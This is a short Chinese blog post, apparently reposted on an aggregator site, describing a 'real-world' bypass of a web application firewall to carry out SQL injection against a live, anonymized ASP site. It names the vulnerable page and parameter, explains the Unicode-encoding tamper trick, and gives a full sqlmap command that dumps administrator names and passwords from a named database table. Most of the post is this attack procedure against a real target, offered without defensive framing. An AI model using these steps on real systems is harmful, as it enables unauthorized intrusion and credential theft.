实战绕过智创防火墙sql注入
Posted 飓风网络安全
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实战绕过智创防火墙sql注入相关的知识,希望对你有一定的参考价值。
目标站:http://www.xxxxx.com/
http://www.xxxxx.com/shangmao/artmore.asp?id=48514 存在报错型注入,也存在cookie注入
http://www.xxxxx.com/shangmao/artmore.asp?id=48514\ 后面加个\或者“ ‘判断
拿去sqlmap注入,突破注入用tamper脚本下的charunicodeencode.py ,都是编码绕过的,我就用字符串 unicode 编码
Example: * Input: SELECT FIELD%20FROM TABLE * Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′
Requirement:
ASP
ASP.NET
Tested against:
Microsoft SQL Server 2000
Microsoft SQL Server 2005
mysql 5.1.56
PostgreSQL 9.0.3
sqlmap.py -u http://www.xxxxx.com/shangmao/artmore.asp
--cookie "id=48514" --level 2 -D hunangyxcb_com_2014 -T applenews_admin_info -C
"adminname,adminpass" --dump --threads=10 --tamper=charunicodeencode.py -v
参数慢慢去领悟,,,,,
以上是关于实战绕过智创防火墙sql注入的主要内容,如果未能解决你的问题,请参考以下文章